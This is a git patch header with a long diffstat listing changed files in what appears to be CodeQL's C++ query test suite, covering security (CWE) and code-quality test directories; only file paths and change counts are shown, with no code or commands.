From c732bd66136f8f9aa6d835f54be42bb90da79c0e Mon Sep 17 00:00:00 2001 From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com> Date: Wed, 10 Jun 2026 12:31:19 +0000 Subject: [PATCH 01/15] Initial plan From f54debd65aade2255e0a5638ba03123742ff5d2e Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Wed, 10 Jun 2026 22:57:08 +0200 Subject: [PATCH 02/15] C++ --- .../examples/BadLocking/AV Rule 107.qlref | 3 +- .../LocalVariableHidesGlobalVariable.qlref | 3 +- .../BadLocking/UnintendedDeclaration.cpp | 6 +- .../test/examples/expressions/PrintAST.qlref | 2 +- .../NoCheckBeforeUnsafePutUser.qlref | 3 +- .../tests/LateCheckOfFunctionArgument.qlref | 3 +- .../Security/CWE/CWE-020/semmle/tests/test.c | 2 +- .../CWE/CWE-078/WordexpTainted.expected | 4 +- .../Security/CWE/CWE-078/WordexpTainted.qlref | 3 +- .../query-tests/Security/CWE/CWE-078/test.cpp | 4 +- .../semmle/tests/FindWrapperFunctions.qlref | 3 +- .../CWE/CWE-1041/semmle/tests/test.cpp | 2 +- ...OfVariableWithUnnecessarilyWideScope.qlref | 3 +- .../Security/CWE/CWE-1126/semmle/tests/test.c | 2 +- .../CustomCryptographicPrimitive.qlref | 3 +- .../Security/CWE/CWE-1240/tests_crypto.cpp | 8 +- ...usWorksWithMultibyteOrWideCharacters.qlref | 3 +- .../CWE/CWE-125/semmle/tests/test.cpp | 16 +- .../CWE/CWE-125/semmle/tests/test1.cpp | 14 +- .../CWE/CWE-125/semmle/tests/test2.cpp | 16 +- .../CWE/CWE-125/semmle/tests/test3.cpp | 6 +- .../AllocMultiplicationOverflow.expected | 20 +- .../AllocMultiplicationOverflow.qlref | 3 +- .../AllocMultiplicationOverflow/test.cpp | 20 +- ...ousUseOfTransformationAfterOperation.qlref | 3 +- .../test.cpp | 8 +- .../IfStatementAdditionOverflow.qlref | 3 +- .../IfStatementAdditionOverflow/test.cpp | 70 +++--- .../ArrayAccessProductFlow.expected | 38 ++-- .../array-access/ArrayAccessProductFlow.qlref | 3 +- .../CWE/CWE-193/array-access/test.cpp | 20 +- .../ConstantSizeArrayOffByOne.expected | 44 ++-- .../ConstantSizeArrayOffByOne.qlref | 3 +- .../CWE/CWE-193/constant-size/test.cpp | 58 ++--- ...ensitiveInformationUnauthorizedActor.qlref | 3 +- .../Security/CWE/CWE-200/test1/test.cpp | 2 +- ...ensitiveInformationUnauthorizedActor.qlref | 3 +- ...ensitiveInformationUnauthorizedActor.qlref | 3 +- .../IncorrectChangingWorkingDirectory.qlref | 3 +- .../CWE/CWE-243/semmle/tests/test.cpp | 4 +- .../tests/IncorrectPrivilegeAssignment.qlref | 3 +- .../CWE/CWE-266/semmle/tests/test.cpp | 4 +- .../CWE/CWE-285/PamAuthorization.qlref | 3 +- .../query-tests/Security/CWE/CWE-285/test.cpp | 2 +- .../Security/CWE/CWE-295/CurlSSL.cpp | 4 +- .../Security/CWE/CWE-295/CurlSSL.qlref | 3 +- .../tests/PrivateCleartextWrite.expected | 24 +-- .../semmle/tests/PrivateCleartextWrite.qlref | 3 +- .../CWE/CWE-359/semmle/tests/test.cpp | 16 +- .../tests/DivideByZeroUsingReturnValue.qlref | 3 +- .../CWE/CWE-369/semmle/tests/test.cpp | 54 ++--- .../semmle/tests/InsecureTemporaryFile.qlref | 3 +- .../CWE/CWE-377/semmle/tests/test.cpp | 2 +- .../MemoryLeakOnFailedCallToRealloc.qlref | 3 +- .../Security/CWE/CWE-401/semmle/tests/test.c | 16 +- .../DecompressionBombs.expected | 28 +-- .../DecompressionBombs.qlref | 3 +- .../CWE-409/DecompressionBombs/brotliTest.cpp | 4 +- .../DecompressionBombs/libarchiveTests.cpp | 2 +- .../CWE/CWE-409/DecompressionBombs/main.cpp | 2 +- .../DecompressionBombs/minizipTest.cpp | 6 +- .../CWE-409/DecompressionBombs/zlibTest.cpp | 10 +- .../CWE-409/DecompressionBombs/zstdTest.cpp | 2 +- .../CWE/CWE-415/semmle/tests/DoubleFree.qlref | 3 +- .../Security/CWE/CWE-415/semmle/tests/test.c | 8 +- .../tests/DangerousUseOfExceptionBlocks.qlref | 3 +- .../CWE/CWE-476/semmle/tests/test.cpp | 12 +- .../tests/FindIncorrectlyUsedSwitch.qlref | 3 +- .../Security/CWE/CWE-561/semmle/tests/test.c | 8 +- .../tests/DangerousUseSSL_shutdown.qlref | 3 +- .../CWE/CWE-670/semmle/tests/test.cpp | 4 +- .../CWE-675/semmle/tests/DoubleRelease.qlref | 3 +- .../CWE/CWE-675/semmle/tests/test.cpp | 6 +- ...lowManagementAfterRefactoringTheCode.qlref | 3 +- ...FlowManagementWhenUsingBitOperations.qlref | 3 +- .../Security/CWE/CWE-691/semmle/tests/test.c | 12 +- .../tests/FindIncorrectlyUsedExceptions.qlref | 3 +- .../CWE/CWE-703/semmle/tests/test.cpp | 6 +- .../tests/ImproperCheckReturnValueScanf.qlref | 3 +- .../CWE/CWE-754/semmle/tests/test.cpp | 16 +- ...finedOrImplementationDefinedBehavior.qlref | 3 +- .../Security/CWE/CWE-758/semmle/tests/test.c | 4 +- ...rorWhenUseBitwiseOrLogicalOperations.qlref | 3 +- .../CWE/CWE-783/semmle/tests/test.cpp | 14 +- ...yLocationAfterEndOfBufferUsingStrlen.qlref | 3 +- ...rPrecedenceLogicErrorWhenUseBoolType.qlref | 3 +- .../Security/CWE/CWE-788/semmle/tests/test.c | 18 +- .../CWE/CWE-788/semmle/tests/test.cpp | 10 +- ...BufferAccessWithIncorrectLengthValue.qlref | 3 +- .../CWE/CWE-805/semmle/tests/test.cpp | 2 +- .../semmle/tests/MemoryUnsafeFunctionScan.cpp | 6 +- .../tests/MemoryUnsafeFunctionScan.qlref | 3 +- .../library-tests/c11_generic/PrintAST.qlref | 2 +- .../conversions/consistency.qlref | 2 +- .../extraction_errors/CompilerErrors.qlref | 2 +- .../extraction_errors/DatabaseQuality.qlref | 2 +- .../extraction_errors/ExtractionMetrics.qlref | 2 +- .../extraction_errors/SucceededIncludes.qlref | 2 +- .../ir/aliased_ssa_consistency_unsound.qlref | 2 +- .../aliased_ssa_ssa_consistency_unsound.qlref | 2 +- .../library-tests/ir/ir/raw_consistency.qlref | 2 +- .../unaliased_ssa_consistency_unsound.qlref | 2 +- ...naliased_ssa_ssa_consistency_unsound.qlref | 2 +- .../ssa/aliased_ssa_consistency_unsound.qlref | 2 +- .../ir/ssa/aliased_ssa_ir_unsound.qlref | 2 +- .../aliased_ssa_ssa_consistency_unsound.qlref | 2 +- .../unaliased_ssa_consistency_unsound.qlref | 2 +- .../ir/ssa/unaliased_ssa_ir_unsound.qlref | 2 +- ...naliased_ssa_ssa_consistency_unsound.qlref | 2 +- .../lossy_pointer_cast/lossy_pointer_cast.c | 4 +- .../lossy_pointer_cast.qlref | 3 +- .../subscript_operator/PrintAST.qlref | 2 +- .../syntax-zoo/aliased_ssa_consistency.qlref | 2 +- .../syntax-zoo/raw_consistency.qlref | 2 +- .../unaliased_ssa_consistency.qlref | 2 +- .../integral_types_ms/integral_type.qlref | 2 +- .../AlertSuppression/AlertSuppression.qlref | 2 +- .../FeatureEnvy/FeatureEnvy.qlref | 3 +- .../Architecture/FeatureEnvy/a.cpp | 6 +- .../InappropriateIntimacy.qlref | 2 +- .../ClassesWithManyFields/cwmf.cpp | 14 +- .../ClassesWithManyFields/cwmf.qlref | 3 +- .../ClassesWithManyFields/different_types.h | 2 +- .../ComplexFunctions/ComplexFunctions.qlref | 3 +- .../ComplexFunctions/complex.c | 2 +- .../GuardedFree/GuardedFree.qlref | 3 +- .../Best Practices/GuardedFree/test.cpp | 10 +- .../DeclarationHidesParameter.qlref | 3 +- .../DeclarationHidesParameter/hiding.cpp | 14 +- .../DeclarationHidesVariable.qlref | 3 +- .../DeclarationHidesVariable/hiding.cpp | 6 +- .../DeclarationHidesVariable.qlref | 3 +- .../LocalVariableHidesGlobalVariable/Hiding.c | 16 +- .../LocalVariableHidesGlobalVariable.qlref | 3 +- .../CommaBeforeMisleadingIndentation.qlref | 3 +- .../CommaBeforeMisleadingIndentation/test.cpp | 10 +- .../Likely Errors/EmptyBlock/EmptyBlock.qlref | 3 +- .../Likely Errors/EmptyBlock/empty_block.cpp | 6 +- .../OffsetUseBeforeRangeCheck.qlref | 3 +- .../OffsetUseBeforeRangeCheck/test.cpp | 12 +- .../Likely Errors/Slicing/Slicing.qlref | 3 +- .../Likely Errors/Slicing/test.cpp | 2 +- .../ConstructorOrMethodWithExactDate.cpp | 8 +- .../Japanese Era/JapaneseEraDate.qlref | 3 +- .../Japanese Era/StructWithExactDate.cpp | 6 +- .../MagicConstantsNumbers.qlref | 3 +- .../MagicConstantsNumbers/a123.c | 2 +- .../MagicConstantsNumbers/b123.c | 2 +- .../MagicConstantsNumbers/case.c | 2 +- .../MagicConstantsNumbers/constants.h | 10 +- .../MagicConstantsNumbers/functions.h | 4 +- .../MagicConstantsNumbers/templates.cpp | 4 +- .../MagicConstantsString.qlref | 3 +- .../MagicConstantsString/constants.h | 2 +- .../MagicConstantsString/joining.cpp | 6 +- .../Best Practices/RuleOfTwo/RuleOfTwo.cpp | 12 +- .../Best Practices/RuleOfTwo/RuleOfTwo.qlref | 3 +- .../SloppyGlobal/SloppyGlobal.qlref | 3 +- .../Best Practices/SloppyGlobal/main.cpp | 14 +- .../UnusedIncludes/unusedIncludes.cpp | 8 +- .../UnusedIncludes/unusedIncludes.qlref | 3 +- .../UnusedLocals/UnusedLocals.qlref | 3 +- .../Unused Entities/UnusedLocals/code.c | 16 +- .../Unused Entities/UnusedLocals/code.cpp | 12 +- .../Unused Entities/UnusedLocals/code2.cpp | 16 +- .../Unused Entities/UnusedLocals/errors.c | 2 +- .../UnusedStaticFunctions.qlref | 3 +- .../UnusedStaticFunctions/unused_functions.c | 8 +- .../UnusedStaticFunctions/unused_mut.c | 4 +- .../unused_static_functions.cpp | 6 +- .../UnusedStaticFunctions/used_by_var_ref.c | 6 +- .../UnusedStaticVariables.qlref | 3 +- .../UnusedStaticVariables/test.cpp | 8 +- .../DeadCodeFunction/DeadCodeFunction.qlref | 3 +- .../Critical/DeadCodeFunction/test.cpp | 2 +- .../Critical/DeadCodeGoto/DeadCodeGoto.qlref | 3 +- .../Critical/DeadCodeGoto/test.cpp | 6 +- .../FileClosed/FileMayNotBeClosed.qlref | 3 +- .../Critical/FileClosed/FileNeverClosed.qlref | 3 +- .../query-tests/Critical/FileClosed/file.c | 8 +- .../GlobalUseBeforeInit.qlref | 3 +- .../Critical/GlobalUseBeforeInit/test.cpp | 4 +- .../InitialisationNotRun.qlref | 3 +- .../Critical/InitialisationNotRun/test.cpp | 4 +- .../LargeParameter/LargeParameter.qlref | 3 +- .../Critical/LargeParameter/test.cpp | 20 +- .../Critical/MemoryFreed/DoubleFree.expected | 30 +-- .../Critical/MemoryFreed/DoubleFree.qlref | 3 +- .../MemoryFreed/MemoryMayNotBeFreed.qlref | 3 +- .../MemoryFreed/MemoryNeverFreed.qlref | 3 +- .../MemoryFreed/UseAfterFree.expected | 50 ++--- .../Critical/MemoryFreed/UseAfterFree.qlref | 3 +- .../Critical/MemoryFreed/my_auto_ptr.cpp | 12 +- .../query-tests/Critical/MemoryFreed/test.cpp | 26 +-- .../Critical/MemoryFreed/test_free.cpp | 124 +++++------ .../IncorrectCheckScanf.qlref | 3 +- .../MissingCheckScanf.expected | 44 ++-- .../MissingCheckScanf/MissingCheckScanf.qlref | 3 +- .../Critical/MissingCheckScanf/test.cpp | 96 ++++----- .../MissingNullTest/MissingNullTest.qlref | 3 +- .../Critical/MissingNullTest/test.cpp | 12 +- .../NewFree/NewArrayDeleteMismatch.qlref | 3 +- .../NewFree/NewDeleteArrayMismatch.qlref | 3 +- .../Critical/NewFree/NewFreeMismatch.qlref | 3 +- .../query-tests/Critical/NewFree/test.cpp | 54 ++--- .../query-tests/Critical/NewFree/test2.cpp | 12 +- .../NotInitialised/NotInitialised.qlref | 3 +- .../Critical/NotInitialised/test.cpp | 4 +- .../NoSpaceForZeroTerminator.qlref | 3 +- .../OverflowCalculated.qlref | 3 +- .../Critical/OverflowCalculated/tests1.cpp | 12 +- .../Critical/OverflowCalculated/tests2.cpp | 4 +- .../Critical/OverflowCalculated/tests3.cpp | 10 +- .../OverflowStatic/OverflowStatic.qlref | 3 +- .../Critical/OverflowStatic/test.c | 8 +- .../Critical/OverflowStatic/test.cpp | 10 +- .../Critical/OverflowStatic/test2.c | 14 +- .../ReturnValueIgnored.qlref | 3 +- .../Critical/ReturnValueIgnored/test.cpp | 2 +- .../Critical/SizeCheck/SizeCheck2.qlref | 3 +- .../query-tests/Critical/SizeCheck/test2.c | 10 +- .../UnsafeUseOfThis/UnsafeUseOfThis.qlref | 2 +- .../Diagnostics/ExtractedFiles.qlref | 2 +- .../Diagnostics/ExtractionErrors.qlref | 2 +- .../Diagnostics/ExtractionWarnings.qlref | 2 +- .../FailedExtractorInvocations.qlref | 2 +- .../CommentedOutCode/CommentedOutCode.qlref | 3 +- .../Documentation/CommentedOutCode/test.c | 10 +- .../Documentation/CommentedOutCode/test2.cpp | 30 +-- .../DocumentApi/DocumentApi.qlref | 3 +- .../DocumentApi/comment_prototypes.c | 12 +- .../Documentation/DocumentApi/definition.c | 4 +- .../TodoComments/FixmeComments.qlref | 3 +- .../TodoComments/TodoComments.qlref | 3 +- .../Documentation/TodoComments/todo.c | 14 +- .../Documentation/TodoComments/todo_fixme.cpp | 12 +- .../Cleanup-DuplicateIncludeGuard.qlref | 3 +- .../Cleanup-DuplicateIncludeGuard/header1.h | 2 +- .../Cleanup-DuplicateIncludeGuard/header2.h | 2 +- .../Cleanup-DuplicateIncludeGuard/header4.h | 2 +- .../Cleanup-DuplicateIncludeGuard/header6.h | 2 +- .../Cleanup-DuplicateIncludeGuard/header7.h | 2 +- .../subfolder/header4.h | 2 +- .../subfolder/header5.h | 2 +- .../LimitedScopeFile/LimitedScopeFile.qlref | 3 +- .../LOC-3/Rule 13/LimitedScopeFile/file1.c | 2 +- .../LimitedScopeFunction.qlref | 3 +- .../LOC-3/Rule 13/LimitedScopeFunction/test.c | 6 +- .../JPL_C/LOC-3/Rule 17/BasicIntTypes.qlref | 3 +- .../query-tests/JPL_C/LOC-3/Rule 17/test.c | 2 +- .../NonConstFunctionPointer.qlref | 3 +- .../Rule 29/NonConstFunctionPointer/test.c | 6 +- .../FunctionPointerConversions.qlref | 3 +- .../Rule 30/FunctionPointerConversions/test.c | 12 +- .../AmbiguouslySignedBitField.qlref | 3 +- .../AmbiguouslySignedBitField/test.cpp | 10 +- .../BadAdditionOverflowCheck.qlref | 3 +- .../ComparisonWithCancelingSubExpr.qlref | 3 +- .../PointlessSelfComparison.qlref | 3 +- .../SignedOverflowCheck.cpp | 14 +- .../SignedOverflowCheck.qlref | 3 +- .../BadAdditionOverflowCheck/templates.cpp | 2 +- .../BadAdditionOverflowCheck/test.cpp | 20 +- .../Arithmetic/BadCheckOdd/BadCheckOdd.qlref | 3 +- .../Arithmetic/BadCheckOdd/test.cpp | 4 +- .../BitwiseSignCheck/BitwiseSignCheck.qlref | 3 +- .../Arithmetic/BitwiseSignCheck/bsc.cpp | 8 +- .../ComparisonPrecedence.qlref | 3 +- .../ComparisonPrecedence/template.cpp | 2 +- .../Arithmetic/ComparisonPrecedence/test.cpp | 16 +- .../FloatComparison/FloatComparison.qlref | 3 +- .../Arithmetic/FloatComparison/c.c | 8 +- .../Arithmetic/IntMultToLong/Buildless.c | 4 +- .../Arithmetic/IntMultToLong/IntMultToLong.c | 28 +-- .../IntMultToLong/IntMultToLong.cpp | 2 +- .../IntMultToLong/IntMultToLong.qlref | 3 +- .../PointlessComparison/ConstVirtual.cpp | 2 +- .../PointlessComparison/PointlessComparison.c | 96 ++++----- .../PointlessComparison.cpp | 10 +- .../PointlessComparison.qlref | 3 +- .../PointlessComparison/RegressionTests.cpp | 2 +- .../PointlessComparison/Templates.cpp | 2 +- .../PointlessComparison/UnsignedGEZero.qlref | 3 +- .../Arithmetic/UnsignedGEZero/Templates.cpp | 2 +- .../UnsignedGEZero/UnsignedGEZero.c | 44 ++-- .../UnsignedGEZero/UnsignedGEZero.cpp | 44 ++-- .../UnsignedGEZero/UnsignedGEZero.qlref | 3 +- .../ContinueInFalseLoop.qlref | 3 +- .../Likely Bugs/ContinueInFalseLoop/test.cpp | 4 +- .../ArrayArgSizeMismatch.qlref | 3 +- .../Conversion/ArrayArgSizeMismatch/test.cpp | 2 +- .../CastArrayPointerArithmetic.expected | 20 +- .../CastArrayPointerArithmetic.qlref | 3 +- .../CastArrayPointerArithmetic/test.cpp | 24 +-- .../ImplicitDowncastFromBitfield.qlref | 3 +- .../ImplicitDowncastFromBitfield/test.cpp | 4 +- .../LossyFunctionResultCast.qlref | 3 +- .../LossyFunctionResultCast/test.cpp | 18 +- .../NonConstantFormat/NonConstantFormat.c | 8 +- .../NonConstantFormat.expected | 40 ++-- .../NonConstantFormat/NonConstantFormat.qlref | 3 +- .../Format/NonConstantFormat/nested.cpp | 10 +- .../Format/NonConstantFormat/test.cpp | 48 ++--- .../SnprintfOverflow/SnprintfOverflow.qlref | 3 +- .../Format/SnprintfOverflow/test.cpp | 8 +- .../TooManyFormatArguments.qlref | 3 +- .../WrongNumberOfFormatArguments.qlref | 3 +- .../Format/WrongNumberOfFormatArguments/a.c | 4 +- .../Format/WrongNumberOfFormatArguments/b.c | 4 +- .../Format/WrongNumberOfFormatArguments/c.c | 4 +- .../custom_printf.cpp | 4 +- .../WrongNumberOfFormatArguments/macros.cpp | 10 +- .../syntax_errors.c | 2 +- .../WrongNumberOfFormatArguments/test.c | 28 +-- .../Buildless/WrongTypeFormatArguments.qlref | 3 +- .../Buildless/second.cpp | 4 +- .../Buildless/tests.c | 2 +- .../Builtin/WrongTypeFormatArguments.qlref | 3 +- .../WrongTypeFormatArguments/Builtin/tests.c | 2 +- .../WrongTypeFormatArguments.qlref | 3 +- .../Linux_mixed_byte_wprintf/tests.cpp | 22 +- .../WrongTypeFormatArguments.qlref | 3 +- .../Linux_mixed_word_size/tests_32.cpp | 4 +- .../Linux_mixed_word_size/tests_64.cpp | 4 +- .../WrongTypeFormatArguments.qlref | 3 +- .../Linux_signed_chars/format.h | 2 +- .../Linux_signed_chars/linux.cpp | 2 +- .../Linux_signed_chars/linux_c.c | 2 +- .../Linux_signed_chars/pri_macros.h | 2 +- .../Linux_signed_chars/printf1.h | 102 ++++----- .../Linux_signed_chars/real_world.h | 8 +- .../Linux_signed_chars/wide_string.h | 2 +- .../WrongTypeFormatArguments.qlref | 3 +- .../Linux_two_byte_wprintf/printf.cpp | 4 +- .../WrongTypeFormatArguments.qlref | 3 +- .../Linux_unsigned_chars/format.h | 2 +- .../Linux_unsigned_chars/pri_macros.h | 2 +- .../Linux_unsigned_chars/printf1.h | 22 +- .../Linux_unsigned_chars/real_world.h | 8 +- .../Linux_unsigned_chars/wide_string.h | 2 +- .../Microsoft/WrongTypeFormatArguments.qlref | 3 +- .../Microsoft/format.h | 2 +- .../Microsoft/pri_macros.h | 2 +- .../Microsoft/printf1.h | 58 ++--- .../Microsoft/real_world.h | 8 +- .../Microsoft/wide_string.h | 4 +- .../WrongTypeFormatArguments.qlref | 3 +- .../Microsoft_no_wchar/format.h | 2 +- .../Microsoft_no_wchar/pri_macros.h | 2 +- .../Microsoft_no_wchar/printf1.h | 54 ++--- .../Microsoft_no_wchar/real_world.h | 8 +- .../Microsoft_no_wchar/wide_string.h | 4 +- .../InconsistentCheckReturnNull.qlref | 3 +- .../InconsistentCheckReturnNull/test.c | 2 +- .../Adding365daysPerYear.qlref | 3 +- .../Leap Year/Adding365DaysPerYear/test.cpp | 10 +- ...UncheckedReturnValueForTimeFunctions.qlref | 2 +- .../UnsafeArrayForDaysOfYear.qlref | 3 +- .../UnsafeArrayForDaysOfYear/test.cpp | 6 +- .../AssignWhereCompareMeant.qlref | 3 +- .../AssignWhereCompareMeant/test.cpp | 48 ++--- .../CompareWhereAssignMeant.qlref | 3 +- .../ExprHasNoEffect.qlref | 3 +- .../CompareWhereAssignMeant/test.cpp | 20 +- .../DubiousNullCheck/DubiousNullCheck.cpp | 8 +- .../DubiousNullCheck/DubiousNullCheck.qlref | 3 +- .../TryCompile-abcdef/ExprHasNoEffect.qlref | 3 +- .../ExprHasNoEffect/ExprHasNoEffect.qlref | 3 +- .../autoconf/ExprHasNoEffect.qlref | 3 +- .../ExprHasNoEffect/autoconf/conftest.c.c | 2 +- .../ExprHasNoEffect/autoconf/conftest_abc.c | 2 +- .../Likely Typos/ExprHasNoEffect/calls.cpp | 4 +- .../Likely Typos/ExprHasNoEffect/expr.cpp | 6 +- .../tmp_abc/ExprHasNoEffect.qlref | 3 +- .../Likely Typos/ExprHasNoEffect/preproc.c | 4 +- .../Likely Typos/ExprHasNoEffect/template.cpp | 2 +- .../ExprHasNoEffect/templatey.cpp | 2 +- .../Likely Typos/ExprHasNoEffect/test.c | 26 +-- .../Likely Typos/ExprHasNoEffect/test.cpp | 4 +- .../Likely Typos/ExprHasNoEffect/volatile.c | 8 +- .../Likely Typos/ExprHasNoEffect/weak.c | 2 +- .../IncorrectNotOperatorUsage.c | 16 +- .../IncorrectNotOperatorUsage.cpp | 18 +- .../IncorrectNotOperatorUsage.qlref | 3 +- .../ShortCircuitBitMask.qlref | 3 +- .../ShortCircuitBitMask/big_ints.cpp | 24 +-- .../UsingStrcpyAsBoolean.qlref | 3 +- .../Likely Typos/UsingStrcpyAsBoolean/test.c | 22 +- .../UsingStrcpyAsBoolean/test.cpp | 40 ++-- .../inconsistentLoopDirection.c | 12 +- .../inconsistentLoopDirection.cpp | 38 ++-- .../inconsistentLoopDirection.qlref | 3 +- .../AllocaInLoop/AllocaInLoop.qlref | 3 +- .../AllocaInLoop/AllocaInLoop1.cpp | 8 +- .../AllocaInLoop/AllocaInLoop1ms.cpp | 6 +- .../AllocaInLoop/AllocaInLoop2.c | 2 +- .../AllocaInLoop/AllocaInLoop3.cpp | 2 +- .../AllocaInLoop/BoundedLoop.cpp | 18 +- .../ImproperNullTermination.qlref | 3 +- .../ImproperNullTerminationTainted.qlref | 3 +- .../ImproperNullTermination/test.cpp | 56 ++--- .../NtohlArrayNoBound/NtohlArrayNoBound.qlref | 3 +- .../NtohlArrayNoBound/test.cpp | 18 +- .../More64BitWaste/More64BitWaste.qlref | 3 +- .../Padding/More64BitWaste/test.cpp | 4 +- .../NonPortablePrintf/NonPortablePrintf.qlref | 3 +- .../Padding/NonPortablePrintf/test.cpp | 8 +- .../Suboptimal64BitType.qlref | 3 +- .../Padding/Suboptimal64BitType/types.c | 2 +- .../PointerOverflow/PointerOverflow.qlref | 3 +- .../PointerOverflow/test.cpp | 8 +- .../ReturnCstrOfLocalStdString.qlref | 3 +- .../ReturnCstrOfLocalStdString/test.cpp | 6 +- .../ReturnStackAllocatedMemory.expected | 34 +-- .../ReturnStackAllocatedMemory.qlref | 3 +- .../ReturnStackAllocatedMemory/test.cpp | 52 ++--- .../StackAddressEscapes.qlref | 3 +- .../StackAddressEscapes/manager.cpp | 2 +- .../StackAddressEscapes/test.cpp | 130 +++++------ .../StrncpyFlippedArgs.qlref | 3 +- .../StrncpyFlippedArgs/test.c | 4 +- .../StrncpyFlippedArgs/test.cpp | 40 ++-- .../SuspiciousCallToMemset.qlref | 3 +- .../SuspiciousCallToMemset/doc_tests.c | 2 +- .../SuspiciousCallToMemset/test.cpp | 60 +++--- .../SuspiciousCallToStrncat.qlref | 3 +- .../SuspiciousCallToStrncat/test.c | 14 +- .../SuspiciousSizeof/SuspiciousSizeof.qlref | 3 +- .../SuspiciousSizeof/test.cpp | 12 +- .../UnsafeUseOfStrcat/strcat.c | 4 +- .../UnsafeUseOfStrcat/strcat.qlref | 3 +- .../UsingExpiredStackAddress.expected | 56 ++--- .../UsingExpiredStackAddress.qlref | 3 +- .../UsingExpiredStackAddress/test.cpp | 108 +++++----- .../IncorrectConstructorDelegation.qlref | 3 +- .../IncorrectConstructorDelegation/test.cpp | 4 +- .../NonVirtualDestructorInBaseClass.cpp | 6 +- .../NonVirtualDestructorInBaseClass.qlref | 3 +- .../ThrowInDestructor/ThrowInDestructor.qlref | 3 +- .../Likely Bugs/OO/ThrowInDestructor/test.cpp | 6 +- .../TlsSettingsMisconfiguration.qlref | 3 +- .../UseOfDeprecatedHardcodedProtocol.qlref | 3 +- .../Likely Bugs/Protocols/test.cpp | 34 +-- .../Likely Bugs/Protocols/test2.cpp | 10 +- .../Likely Bugs/Protocols/test3.cpp | 2 +- .../RedundantNullCheckSimple.cpp | 24 +-- .../RedundantNullCheckSimple.expected | 36 ++-- .../RedundantNullCheckSimple.qlref | 3 +- .../ReturnConstType/ReturnConstType.qlref | 3 +- .../Likely Bugs/ReturnConstType/test.cpp | 14 +- .../ReturnConstTypeMember.qlref | 3 +- .../ReturnConstTypeMember/templates.cpp | 2 +- .../ReturnConstTypeMember/test.cpp | 6 +- .../ShortLoopVarName/ShortLoopVarName.cpp | 8 +- .../ShortLoopVarName/ShortLoopVarName.qlref | 3 +- .../ImplicitFunctionDeclaration.qlref | 3 +- .../MistypedFunctionArguments.qlref | 3 +- .../TooFewArguments.qlref | 3 +- .../TooManyArguments.qlref | 3 +- .../Underspecified Functions/test.c | 50 ++--- .../UseInOwnInitializer.qlref | 3 +- .../Likely Bugs/UseInOwnInitializer/test.cpp | 8 +- .../Metrics/Functions/FunLinesOfCode.qlref | 2 +- .../Functions/FunLinesOfComments.qlref | 2 +- .../Metrics/Functions/FunNumberOfCalls.qlref | 2 +- .../Functions/FunNumberOfParameters.qlref | 2 +- .../Functions/FunNumberOfStatements.qlref | 2 +- .../Rule 2/BoundedLoopIterations.qlref | 3 +- .../query-tests/Power of 10/Rule 2/loops.cpp | 26 +-- .../CWE/CWE-014/MemsetMayBeDeleted.qlref | 3 +- .../query-tests/Security/CWE/CWE-014/test.cpp | 6 +- ..._Path_Traversal__char_console_fopen_11.cpp | 4 +- .../SAMATE/TaintedPath/TaintedPath.expected | 4 +- .../SAMATE/TaintedPath/TaintedPath.qlref | 3 +- .../SAMATE/ExecTainted/ExecTainted.expected | 4 +- .../SAMATE/ExecTainted/ExecTainted.qlref | 3 +- .../CWE/CWE-078/SAMATE/ExecTainted/tests.cpp | 4 +- .../semmle/ExecTainted/ExecTainted.expected | 50 ++--- .../semmle/ExecTainted/ExecTainted.qlref | 3 +- .../CWE/CWE-078/semmle/ExecTainted/test.cpp | 66 +++--- .../CWE/CWE-079/semmle/CgiXss/CgiXss.expected | 8 +- .../CWE/CWE-079/semmle/CgiXss/CgiXss.qlref | 3 +- .../CWE/CWE-079/semmle/CgiXss/search.c | 8 +- .../UncontrolledProcessOperation.expected | 4 +- .../UncontrolledProcessOperation.qlref | 3 +- .../UncontrolledProcessOperation/test.cpp | 4 +- .../UncontrolledProcessOperation.expected | 22 +- .../UncontrolledProcessOperation.qlref | 3 +- .../UncontrolledProcessOperation/test.cpp | 34 +-- .../CWE-119/SAMATE/BadlyBoundedWrite.qlref | 3 +- .../SAMATE/OffsetUseBeforeRangeCheck.qlref | 3 +- .../CWE/CWE-119/SAMATE/OverflowBuffer.qlref | 3 +- .../SAMATE/OverflowDestination.expected | 2 +- .../CWE-119/SAMATE/OverflowDestination.qlref | 3 +- .../CWE/CWE-119/SAMATE/OverflowStatic.qlref | 3 +- .../CWE/CWE-119/SAMATE/OverrunWrite.qlref | 3 +- .../CWE-119/SAMATE/OverrunWriteFloat.qlref | 3 +- .../SAMATE/OverrunWriteProductFlow.expected | 32 +-- .../SAMATE/OverrunWriteProductFlow.qlref | 3 +- .../CWE-119/SAMATE/StrncpyFlippedArgs.qlref | 3 +- .../CWE-119/SAMATE/UnboundedWrite.expected | 2 +- .../CWE/CWE-119/SAMATE/UnboundedWrite.qlref | 3 +- .../SAMATE/VeryLikelyOverrunWrite.qlref | 3 +- .../Security/CWE/CWE-119/SAMATE/test.cpp | 40 ++-- .../Security/CWE/CWE-119/SAMATE/tests.cpp | 34 +-- .../semmle/tests/BadlyBoundedWrite.qlref | 3 +- .../tests/OffsetUseBeforeRangeCheck.qlref | 3 +- .../CWE-119/semmle/tests/OverflowBuffer.qlref | 3 +- .../semmle/tests/OverflowDestination.expected | 10 +- .../semmle/tests/OverflowDestination.qlref | 3 +- .../CWE-119/semmle/tests/OverflowStatic.qlref | 3 +- .../CWE-119/semmle/tests/OverrunWrite.qlref | 3 +- .../semmle/tests/OverrunWriteFloat.qlref | 3 +- .../semmle/tests/StrncpyFlippedArgs.qlref | 3 +- .../semmle/tests/UnboundedWrite.expected | 6 +- .../CWE-119/semmle/tests/UnboundedWrite.qlref | 3 +- .../semmle/tests/VeryLikelyOverrunWrite.qlref | 3 +- .../CWE/CWE-119/semmle/tests/main.cpp | 2 +- .../semmle/tests/overflowdestination.cpp | 12 +- .../CWE/CWE-119/semmle/tests/tests.cpp | 202 +++++++++--------- .../CWE/CWE-119/semmle/tests/tests_restrict.c | 2 +- .../CWE/CWE-119/semmle/tests/unions.cpp | 6 +- .../CWE-119/semmle/tests/var_size_struct.cpp | 10 +- .../UnsafeUseOfStrcat/UnsafeUseOfStrcat.qlref | 3 +- .../CWE-120/semmle/UnsafeUseOfStrcat/test.c | 4 +- .../semmle/tests/BadlyBoundedWrite.qlref | 3 +- .../CWE-120/semmle/tests/OverrunWrite.qlref | 3 +- .../semmle/tests/OverrunWriteFloat.qlref | 3 +- .../semmle/tests/UnboundedWrite.expected | 12 +- .../CWE-120/semmle/tests/UnboundedWrite.qlref | 3 +- .../semmle/tests/VeryLikelyOverrunWrite.qlref | 3 +- 